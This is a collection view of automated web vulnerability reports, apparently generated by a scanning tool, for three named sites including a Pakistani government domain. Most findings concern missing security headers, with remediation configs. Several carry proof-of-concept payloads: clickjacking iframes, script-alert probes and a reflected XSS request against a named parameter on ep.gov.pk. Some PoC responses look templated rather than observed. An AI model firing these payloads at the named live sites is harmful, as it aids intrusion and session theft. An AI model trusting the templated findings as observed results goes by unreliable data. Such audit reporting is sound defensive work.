Viewing Collection: web_static_analysis_generate_web_vulnerability_report


_id created_at url tool result summary
6a0d64865bbc057e6099d075
Wed May 20 2026 07:36:38 GMT+0000 (Coordinated Universal Time)
https://pro.anveshaktool.in/
generate_web_vulnerability_report 
{
  "url": "https://pro.anveshaktool.in/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-20T07:36:38.922194+00:00",
  "report": "### [Multiple IPs Found / https://pro.anveshaktool.in/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThis informational finding indicates that multiple IP addresses were identified for the domain `pro.anveshaktool.in`. These include IPv4 and IPv6 addresses associated with Cloudflare's infrastructure (e.g., 104.21.23.154, 172.67.211.177). This behavior is typical when a website is fronted by a CDN or reverse proxy such as Cloudflare, which distributes traffic across geographically dispersed edge nodes.\n\nWhile not inherently a vulnerability, identifying multiple IPs can assist attackers in mapping network topology, detecting backend configurations, or attempting to bypass WAF protections by targeting less protected origins directly.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to discover all A/AAAA records:\n\n```bash\n$ dig pro.anveshaktool.in A AAAA +short\n104.21.23.154\n172.67.211.177\n2606:4700:3030::6815:179a\n2606:4700:3031::ac43:d3b1\n```\n\nThey might then attempt direct access to these IPs to check whether they bypass Cloudflare’s protection layer. If successful, they could potentially exploit vulnerabilities on the origin server without going through the CDN’s filtering mechanisms.\n\n**Business Impact**  \nAlthough this does not pose immediate risk, it provides reconnaissance value to adversaries who may uncover misconfigured internal systems or unprotected endpoints behind public-facing services.\n\n**Remediation**  \nEnsure that origin servers are configured to reject requests not routed through the CDN/WAF:\n- Restrict access at the firewall level to allow only trusted CDN ranges.\n- Implement proper host header validation on the origin server.\n- Regularly audit DNS entries and remove unnecessary mappings.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThe HTTP Strict Transport Security (HSTS) header is missing from responses sent by the application. The HSTS header instructs browsers to enforce secure communication over HTTPS for future visits to the site, preventing downgrade attacks and cookie hijacking over unencrypted channels.\n\nWithout this header, users remain vulnerable to man-in-the-middle attacks during their initial visit or after clearing browser state.\n\n**Attack Scenario (Proof of Concept)**  \nIf an attacker performs a MITM attack and intercepts the first connection attempt to `http://pro.anveshaktool.in`, they can redirect the user to a malicious clone of the site before the browser upgrades to HTTPS. Example interception flow:\n\n1. User types `anveshaktool.in`.\n2. Browser attempts HTTP request.\n3. Attacker responds with fake login page.\n4. Credentials stolen.\n\nAlternatively, if cookies lack the `Secure` flag, session tokens could be transmitted over plaintext HTTP if the user manually navigates to HTTP URLs.\n\n**Business Impact**  \nPotential exposure of sensitive credentials and sessions due to insecure transport protocols. Could lead to phishing success rates increasing and compromise of authenticated accounts.\n\n**Remediation**  \nAdd the following header to all HTTPS responses:\n\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\n\nOr in NGINX:\n\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\" always;\n```\n\nAlso consider submitting your domain to the HSTS preload list maintained by Google.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-http-strict-transport-security-hsts)\n\nCWE: CWE-319  \nRFC: RFC 6797  \n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/sitemap.xml / https://pro.anveshaktool.in/sitemap.xml]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/sitemap.xml |\n\n**Description**  \nSame as previous entry but applies specifically to `/sitemap.xml`. Lack of HSTS here means even static assets served under HTTPS are susceptible to downgrade attacks unless globally enforced.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker could manipulate sitemap delivery to inject links pointing to non-TLS versions of pages, tricking crawlers into indexing insecure paths.\n\nExample intercepted response modification:\n\n```xml\n<url>\n  <loc>http://pro.anveshaktool.in/login</loc>\n</url>\n```\n\nThis increases chances of exposing login forms or other sensitive interfaces over HTTP.\n\n**Business Impact**  \nRisk of search engines indexing insecure versions of critical pages, leading to increased attack surface and potential credential theft.\n\n**Remediation**  \nApply global HSTS headers as described previously. Ensure consistent enforcement across all sub-resources including XML documents.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nMissing HSTS on `robots.txt` allows attackers to tamper with crawler instructions over HTTP, potentially hiding malicious directories or exposing unintended ones.\n\n**Attack Scenario (Proof of Concept)**  \nIntercepting and modifying `robots.txt` delivered over HTTP:\n\nOriginal:\n```\nUser-agent: *\nDisallow: /admin/\n```\n\nModified:\n```\nUser-agent: *\nAllow: /\n```\n\nThis could cause automated scanners to index restricted areas or miss important hidden paths.\n\n**Business Impact**  \nMisleading SEO bots and increasing visibility of sensitive directories. Also opens up possibilities for stealthier reconnaissance.\n\n**Remediation**  \nEnforce HSTS globally as outlined earlier. Additionally, serve `robots.txt` exclusively over HTTPS and validate its integrity regularly.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe absence of the `X-Content-Type-Options: nosniff` header leaves older browsers open to MIME-type confusion attacks. In such cases, a file intended to be parsed as text/plain may instead be interpreted as executable JavaScript or HTML depending on byte patterns detected by the browser.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a `.txt` file containing embedded script tags:\n\n```html\n<script>alert(1)</script>\n```\n\nIf served without correct Content-Type and lacking `nosniff`, some browsers may execute the payload as JavaScript.\n\nRequest:\n```http\nGET /uploads/malicious.txt HTTP/1.1\nHost: pro.anveshaktool.in\n```\n\nResponse lacks both `Content-Type` and `X-Content-Type-Options`.\n\nBrowser interprets content based on sniffing logic → XSS triggered.\n\n**Business Impact**  \nPossible cross-site scripting (XSS) exploitation via MIME-type confusion, especially concerning legacy clients or misconfigured upload handlers.\n\n**Remediation**  \nSet the following header in all HTTP responses:\n\nApache:\n```apache\nHeader always set X-Content-Type-Options \"nosniff\"\n```\n\nNGINX:\n```nginx\nadd_header X-Content-Type-Options \"nosniff\" always;\n```\n\nEnsure accurate `Content-Type` headers accompany each resource.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-x-content-type-options)\n\nCWE: CWE-116\n\n---\n\n### [HTTPS Content Available via HTTP / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nResources originally accessed securely over HTTPS are also available over plain HTTP. This undermines confidentiality guarantees and exposes data to eavesdropping or manipulation en route.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing `http://pro.anveshaktool.in/robots.txt` reveals same content as HTTPS version:\n\n```bash\ncurl http://pro.anveshaktool.in/robots.txt\n```\n\nSensitive directives within `robots.txt` become visible to passive observers on shared networks or compromised proxies.\n\n**Business Impact**  \nExposure of potentially sensitive information about disallowed paths, weakening overall defense posture against automated scanning tools.\n\n**Remediation**  \nRedirect all HTTP traffic to HTTPS permanently using 301 redirects:\n\nApache:\n```apache\nRewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]\n```\n\nNGINX:\n```nginx\nserver {\n    listen 80;\n    return 301 https://$host$request_uri;\n}\n```\n\nAdditionally, configure HSTS to prevent future regressions.\n\n---\n\n### [Re-examine Cache-control Directives / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe `Cache-Control` header is either absent or improperly configured, allowing caching of responses by intermediate proxies or browsers. While acceptable for static assets, improper caching of dynamic or sensitive content poses risks.\n\n**Attack Scenario (Proof of Concept)**  \nIf `robots.txt` contains time-sensitive exclusions and gets cached indefinitely:\n\n```http\nCache-Control: max-age=31536000\n```\n\nThen changes made to exclude new admin panels won’t propagate immediately, leaving them indexed temporarily.\n\n**Business Impact**  \nDelayed propagation of updated security policies; possible leakage of temporary secrets or private routes.\n\n**Remediation**  \nImplement granular cache control strategies:\n\nFor sensitive files:\n```http\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nExpires: 0\n```\n\nFor static assets:\n```http\nCache-Control: public, max-age=31536000\n```\n\nReview all endpoints and tailor caching rules accordingly.\n\n---\n\n### [Clickjacking Protection / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThe `X-Frame-Options` header is not present, making the application susceptible to clickjacking attacks. An attacker could embed the page inside an invisible iframe and trick users into performing unintended actions (e.g., clicking buttons, submitting forms).\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious webpage embedding the target app:\n\n```html\n<iframe src=\"https://pro.anveshaktool.in/\" width=\"100%\" height=\"100%\" style=\"opacity: 0;\"></iframe>\n<button onclick=\"document.querySelector('iframe').contentWindow.postMessage(...)\" style=\"position:absolute;top:200px;left:300px;\">Click Me!</button>\n```\n\nVictim clicks button believing it belongs to the attacker’s site, unknowingly interacting with framed content.\n\n**Business Impact**  \nUnauthorized actions performed on behalf of logged-in users, including form submissions, deletions, or privilege escalations.\n\n**Remediation**  \nAdd the following header to all responses:\n\nApache:\n```apache\nHeader always set X-Frame-Options \"DENY\"\n# Or \"SAMEORIGIN\" if framing needed internally\n```\n\nNGINX:\n```nginx\nadd_header X-Frame-Options \"DENY\" always;\n```\n\nConsider implementing Content Security Policy (`frame-ancestors`) for more modern protection.\n\nReference: [OWASP Clickjacking Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)\n\nCWE: CWE-451\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nDuplicate of prior HSTS findings. No additional context provided beyond what already covered.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous HSTS-related sections.\n\n**Business Impact**  \nSee previous HSTS-related sections.\n\n**Remediation**  \nSee previous HSTS-related sections.\n\n---\n\n### [MIME Type Confusion / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nSame root cause as earlier X-Content-Type-Options issue. Absence of `nosniff` directive enables MIME-sniffing-based attacks.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous X-Content-Type-Options section.\n\n**Business Impact**  \nSee previous X-Content-Type-Options section.\n\n**Remediation**  \nSee previous X-Content-Type-Options section.",
  "summary": {
    "total": 11
  }
}
 
{
  "total": 11
}
6a0e864d0759bb65a6ed1f87
Thu May 21 2026 04:13:01 GMT+0000 (Coordinated Universal Time)
https://springs.com.pk
generate_web_vulnerability_report 
{
  "url": "https://springs.com.pk",
  "category": "web_vulnerability",
  "timestamp": "2026-05-21T04:13:01.038209+00:00",
  "report": "### [Multiple IPs Found / springs.com.pk / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk |\n\n**Description**  \nThe Nikto scan identified that the domain `springs.com.pk` resolves to multiple IP addresses: one IPv4 (`208.91.112.55`) and one IPv6 (`2001:cdba::3257:9652`). This is typically normal behavior for dual-stack environments but can also indicate potential misconfigurations or inconsistencies in load balancing, CDN setup, or DNS round-robin configurations.\n\nAn attacker may use this information during reconnaissance to map out infrastructure redundancy, identify backend systems, or attempt targeted attacks against less secure endpoints.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker performs a DNS lookup using `dig` or `nslookup`:  \n   ```bash\n   dig A springs.com.pk\n   dig AAAA springs.com.pk\n   ```\n2. Observes both IPv4 and IPv6 records returned.\n3. Probes each endpoint individually via HTTP(S) requests to determine differences in response headers, content, or security posture:\n   ```bash\n   curl -I http://[2001:cdba::3257:9652]/\n   curl -I http://208.91.112.55/\n   ```\n\nThis could reveal inconsistent configurations across different servers or expose legacy services on older stacks.\n\n**Business Impact**  \nWhile not directly exploitable, exposure of multiple IPs increases the attack surface by revealing additional network entry points. It may assist attackers in identifying outdated or misconfigured hosts which might lack current patches or hardened configurations.\n\n**Remediation**  \nEnsure all exposed IP addresses are intentionally configured and uniformly secured:\n- Audit DNS records to confirm only necessary IPs are published.\n- Ensure consistent application-level and server-level hardening across all resolved endpoints.\n- Implement centralized logging and monitoring for traffic anomalies from these IPs.\n- Where applicable, restrict access at the firewall level if certain IPs should not be publicly accessible.\n\n---\n\n### [Missing Content Security Policy / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe website does not implement a Content Security Policy (CSP), leaving it vulnerable to Cross-Site Scripting (XSS) exploitation. CSP provides an added layer of protection by allowing website owners to define trusted sources of content and restrict inline scripts or object execution.\n\nWithout CSP, even minor XSS flaws become more dangerous as they allow arbitrary script injection without mitigation mechanisms such as nonce-based restrictions or strict-src directives.\n\n**Attack Scenario (Proof of Concept)**  \nIf an XSS vulnerability exists elsewhere on the site, an attacker could inject malicious JavaScript like:\n```html\n<script>alert(document.cookie)</script>\n```\nBecause no CSP header blocks inline execution, the browser executes the payload, potentially stealing session cookies or performing actions under user context.\n\nExample request showing missing CSP:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nResponse Headers:\nServer: Apache\nContent-Type: text/html; charset=UTF-8\n...\n(No Content-Security-Policy header present)\n```\n\n**Business Impact**  \nLack of CSP increases risk of successful XSS exploitation, leading to account compromise, phishing, credential theft, or defacement. In regulated industries, this may lead to compliance violations related to data integrity and confidentiality.\n\n**Remediation**  \nImplement a strong CSP policy via HTTP response headers:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none';\"\n```\nOr dynamically within HTML `<meta>` tags:\n```html\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'self';\">\n```\nAvoid `'unsafe-inline'` unless absolutely required. Use nonces or hashes when needed.\n\nReference: [OWASP CSP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html), CWE-1021\n\n---\n\n### [Missing X-Frame-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header is absent from responses, making the site susceptible to clickjacking attacks. Clickjacking occurs when a malicious page overlays transparent elements over legitimate UI components, tricking users into clicking unintended actions.\n\nProperly setting `X-Frame-Options` prevents framing by third-party sites, mitigating such risks.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates an HTML page embedding the target in an iframe:\n```html\n<iframe src=\"https://springs.com.pk/\" width=\"800\" height=\"600\"></iframe>\n<style>iframe { opacity: 0; }</style>\n<div style=\"position:absolute;top:200px;left:300px;\">Click here to win!</div>\n```\nVictim clicks what appears to be a harmless link, but actually interacts with hidden buttons inside the framed page—e.g., submitting forms or authorizing transactions unknowingly.\n\n**Business Impact**  \nPotential unauthorized actions taken on behalf of authenticated users, including financial transfers, profile changes, or deletion of resources. Reputational harm due to perceived lack of basic security controls.\n\n**Remediation**  \nAdd the following HTTP response header:\n```apache\nHeader always append X-Frame-Options SAMEORIGIN\n```\nAlternatively, use modern alternatives like `frame-ancestors` directive in CSP:\n```http\nContent-Security-Policy: frame-ancestors 'self';\n```\n\nReference: [OWASP Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html), CWE-451\n\n---\n\n### [Missing HSTS Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nHTTP Strict Transport Security (HSTS) is not enforced, meaning browsers may still connect over unencrypted HTTP initially before being redirected to HTTPS. An active man-in-the-middle (MITM) attacker could intercept initial plaintext requests and prevent redirection to HTTPS, exposing sensitive data.\n\nEnabling HSTS ensures that future connections automatically upgrade to HTTPS, reducing MITM risks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Victim types `springs.com.pk` in their browser.\n2. Initial connection made over HTTP (if cached DNS resolves to HTTP first).\n3. Attacker intercepts request and serves fake login form instead of redirecting to HTTPS version.\n4. User submits credentials over insecure channel.\n\nExample response lacks HSTS:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nServer: Apache\nLocation: https://springs.com.pk/\n...\n(No Strict-Transport-Security header)\n```\n\n**Business Impact**  \nRisk of session hijacking, credential interception, and downgrade attacks. Especially critical for authentication flows or e-commerce functionality.\n\n**Remediation**  \nSet the HSTS header with sufficient max-age and includeSubDomains/preload flags:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS certificate is valid and properly configured prior to enabling HSTS.\n\nReference: [RFC 6797](https://tools.ietf.org/html/rfc6797), OWASP Transport Layer Protection Cheat Sheet, CWE-319\n\n---\n\n### [Missing X-Content-Type-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Content-Type-Options` header is missing, increasing susceptibility to MIME type sniffing attacks. Browsers sometimes guess file types based on content rather than declared MIME types, which can result in executable files being interpreted as HTML or scripts.\n\nSetting `X-Content-Type-Options: nosniff` instructs browsers to strictly adhere to declared MIME types, preventing such misinterpretation.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a file named `image.jpg`, but its contents are actually HTML with embedded JavaScript:\n```html\n<script>alert('Sniffed!');</script>\n```\nIf served with incorrect MIME type (`text/plain`) but browser sniffs it as HTML, the script will execute.\n\nExample response shows absence:\n```http\nGET /upload/image.jpg HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nContent-Type: text/plain\n...\n(No X-Content-Type-Options header)\n```\n\n**Business Impact**  \nIncreased likelihood of XSS and other client-side code injection vulnerabilities. Can facilitate bypass of input validation and content filtering systems.\n\n**Remediation**  \nInclude the following HTTP response header globally:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nApply especially to dynamic content, uploaded files, and API responses.\n\nReference: [MDN Web Docs – X-Content-Type-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options), CWE-16\n\n---",
  "summary": {
    "total": 5
  }
}
 
{
  "total": 5
}
6a0fac7f3baacd71f234d7f0
Fri May 22 2026 01:08:15 GMT+0000 (Coordinated Universal Time)
https://ep.gov.pk/
generate_web_vulnerability_report 
{
  "url": "https://ep.gov.pk/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-22T01:08:15.278179+00:00",
  "report": "### [Nikto Scan Completed / https://ep.gov.pk/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis entry indicates that a Nikto scan was performed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items including over 6700 potentially dangerous files/CGIs, outdated server versions, and various server configuration issues. This log does not indicate any specific vulnerability but rather confirms that a scan occurred.\n\n**Attack Scenario (Proof of Concept)**  \nAs this is merely a logging event indicating completion of a scan tool, there is no direct exploitation path. However, attackers may use tools like Nikto during reconnaissance phases to enumerate known vulnerabilities or misconfigurations on web servers.\n\nExample usage:\n```bash\nnikto -h https://ep.gov.pk/\n```\n\n**Business Impact**  \nWhile this finding itself has no impact, its presence suggests that automated scanning activity has taken place, possibly by threat actors or internal security teams. It highlights the importance of monitoring such activities and ensuring systems are hardened against common exposures.\n\n**Remediation**  \nThere is no remediation required for this informational finding. Ensure regular patching and hardening practices are followed to reduce exposure to findings identified by scanners like Nikto.\n\n---\n\n### [Content Security Policy Configuration / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nA Content Security Policy (CSP) header defines approved sources of content that the browser may load. Its absence allows potential execution of malicious scripts from unauthorized domains, increasing risk of XSS attacks. The lack of CSP leaves the application vulnerable to inline script injections and other client-side threats.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker could inject arbitrary JavaScript into pages lacking CSP enforcement:\n\nRequest:\n```http\nGET / HTTP/1.1\nHost: ep.gov.pk\n```\n\nResponse lacks `Content-Security-Policy` header:\n```http\nHTTP/1.1 200 OK\nServer: Apache\n...\n```\n\nPayload Example:\n```html\n<script>alert('XSS')</script>\n```\n\nIf reflected without sanitization, this can execute in user browsers.\n\n**Business Impact**  \nWithout CSP, the site becomes more susceptible to cross-site scripting (XSS), clickjacking, and data leakage risks. These can lead to compromised sessions, defacement, or phishing attacks targeting users.\n\n**Remediation**  \nImplement a strong CSP policy via HTTP response headers. Example:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none'\"\n```\nReference: [OWASP CSP](https://owasp.org/www-community/controls/Content_Security_Policy), CWE-1021\n\n---\n\n### [Clickjacking Protection / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header prevents rendering of the page within frames, protecting against clickjacking attacks. Without it, attackers can embed the page inside an iframe and trick users into performing unintended actions.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious HTML page embedding the target:\n```html\n<iframe src=\"https://ep.gov.pk/\" width=\"100%\" height=\"100%\"></iframe>\n```\nBy overlaying transparent elements, they manipulate clicks leading to unintended behavior.\n\n**Business Impact**  \nUsers might unknowingly perform sensitive actions (e.g., submitting forms, changing settings) under attacker control, resulting in account compromise or fraudulent transactions.\n\n**Remediation**  \nAdd the following header to all responses:\n```apache\nHeader always set X-Frame-Options DENY\n```\nOr allow only trusted origins:\n```apache\nHeader always set X-Frame-Options SAMEORIGIN\n```\nReference: [OWASP Clickjacking](https://owasp.org/www-community/attacks/Clickjacking), CWE-1021\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nMissing HSTS (`Strict-Transport-Security`) header means the website doesn't enforce encrypted communication. Attackers can exploit man-in-the-middle scenarios using protocol downgrade attacks to intercept traffic.\n\n**Attack Scenario (Proof of Concept)**  \nUser accesses `http://ep.gov.pk`, gets redirected to HTTPS. An attacker intercepts initial HTTP request and redirects to a fake login portal.\n\n**Business Impact**  \nRisk of credential theft, session hijacking, and eavesdropping due to insecure connections being accepted.\n\n**Remediation**  \nSet the HSTS header with appropriate directives:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS is properly configured before enabling HSTS.  \nReference: [OWASP HSTS](https://owasp.org/www-project-cheat-sheets/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html), CWE-319\n\n---\n\n### [MIME Type Confusion / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nAbsence of the `X-Content-Type-Options: nosniff` header allows browsers to guess MIME types based on file contents. This can result in executable content being interpreted as benign, facilitating XSS or drive-by downloads.\n\n**Attack Scenario (Proof of Concept)**  \nUpload a `.jpg` file containing JavaScript. If served without proper MIME type and missing `nosniff`, browser executes it as JS.\n\n**Business Impact**  \nPotential for XSS, malware delivery, and bypassing content-type restrictions.\n\n**Remediation**  \nEnforce correct MIME handling:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nAlso ensure accurate server-side MIME declarations.  \nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#x-content-type-options), CWE-16\n\n---\n\n### [Inconsistent Redirection / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nWhen issuing a redirect (HTTP 3xx status), the server includes unexpected HTML content such as links or forms. This violates best practice and increases risk of phishing or manipulation.\n\n**Attack Scenario (Proof of Concept)**  \nPOST request triggers redirect with embedded form:\n```http\nPOST /ep_Complaint/Default_Test.aspx HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n...\n\ntxt_ArticleNo=<malicious_input>\n\nHTTP/1.1 302 Found\nLocation: /error.html\n\n<html><body><form action=\"/phish\" method=\"post\">...</form></body></html>\n```\n\n**Business Impact**  \nRedirects with unexpected content can facilitate phishing attempts or confuse clients relying on standard HTTP semantics.\n\n**Remediation**  \nEnsure 3xx responses contain minimal/no body content. Remove unnecessary HTML from redirect responses.  \nReference: [RFC 7231 Section 6.4](https://tools.ietf.org/html/rfc7231#section-6.4)\n\n---\n\n### [Reflected XSS via textfieldz / https://ep.gov.pk/track.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/track.asp |\n\n**Description**  \nInput from the `textfieldz` parameter is directly echoed back in the response without sanitization, allowing execution of arbitrary scripts when rendered in the victim's browser.\n\n**Attack Scenario (Proof of Concept)**  \nSubmit payload via POST:\n```http\nPOST /track.asp HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\ntextfieldz=<script>alert(document.cookie)</script>\n```\n\nResponse reflects unsanitized input:\n```html\n<p>You searched for: <script>alert(document.cookie)</script></p>\n```\n\n**Business Impact**  \nSession hijacking, credential theft, and social engineering attacks possible through crafted URLs.\n\n**Remediation**  \nSanitize and encode output contextually:\n```asp\nResponse.Write Server.HTMLEncode(Request.Form(\"textfieldz\"))\n```\nUse frameworks with auto-escaping features.  \nReference: [OWASP XSS Prevention Cheat 